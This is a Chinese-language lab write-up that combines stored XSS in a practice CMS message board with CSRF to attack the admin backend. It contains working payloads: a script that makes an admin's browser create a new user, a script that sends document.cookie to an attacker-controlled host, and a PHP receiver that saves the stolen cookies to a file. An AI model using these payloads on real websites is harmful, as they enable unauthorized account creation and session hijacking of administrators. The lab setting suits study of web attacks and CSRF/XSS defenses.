csrf+xss组合拳
一、环境搭建
靶场cms文章管理系统
二、流程开始
这是系统前端
data:image/s3,"s3://crabby-images/adcbd/adcbdb85132e45e1413a65652181c6b97f0a61d1" alt=""
系统管理后台
data:image/s3,"s3://crabby-images/4bc26/4bc26b0b0fd7a319b8c51058586ab77ea454e4f4" alt=""
而我们要打到后台管理员的cookie,结合前端存储型的xss完全可以实现,那后端怎么被打到cookie呢,我们来从这里添加用户开始分析数据包来说明
data:image/s3,"s3://crabby-images/d888b/d888be450ac055bccaea25031f0fb22a9d5a323d" alt=""
看看数据包。其中提交的字段是act=add(添加),username、password
data:image/s3,"s3://crabby-images/fdd0b/fdd0b655b3bcb9f575653748c00a23077e9388eb" alt=""
那我们通过编写恶意js
data:image/s3,"s3://crabby-images/dde6f/dde6f6a23abd0db4c91e92eab7c4a13e2786505a" alt=""
<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "http://192.168.137.45/cms/cms/admin/user.action.php", false);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=waou&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>
寻找前端存储型xss,在这里留言板
data:image/s3,"s3://crabby-images/4c172/4c1722d584bedacde4d788a96d98c5d876f79b4f" alt=""
去后台查看很明显插入了
data:image/s3,"s3://crabby-images/04adf/04adfd4b5d6780dc24e53e6f37a6e1a1144f9130" alt=""
我们把我书写的恶意js插入进去,这段恶意js创建的是waou用户,插入看看吧
data:image/s3,"s3://crabby-images/2b585/2b58588f78f1a3d087ca6620911314ccfa5d3723" alt=""
插入成功
data:image/s3,"s3://crabby-images/96a93/96a933bc321b01617bd7df8cf0f6616c50293b54" alt=""
看看结果waou是否被创建
data:image/s3,"s3://crabby-images/42b93/42b93ef21990bb3cc6a8687becca617fad682077" alt=""
成功,不一定添加管理员,也可以盗取cookie,这个漏洞的最大问题还是存储型漏洞,这个框架也没用csrf防御的tokle值,所以导致管理员点击后直接创建新管理员
盗取cookie:
<script>
var cookie = document.cookie;
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://192.168.137.45/ceshi/cookie.php?cookie=" + encodeURIComponent(cookie), true);
xhr.send();
</script>
攻击机192.168.137.45接收
data:image/s3,"s3://crabby-images/83fca/83fca976f36441efcb31cc837e2e2bd6e92cc977" alt=""
<?php
if (isset($_GET['cookie'])) {
$cookie = $_GET['cookie'];
$file = 'cookie.txt';
if (file_put_contents($file, $cookie) !== false) {
echo "Cookie has been saved to cookie.txt";
} else {
echo "Failed to save cookie.";
}
} else {
echo "No cookie received.";
}
?>
访问之后可以看到cookie已经被盗取
data:image/s3,"s3://crabby-images/f7ef2/f7ef25f48ee0c46c4a80ec0251d1ec40ec60f13b" alt=""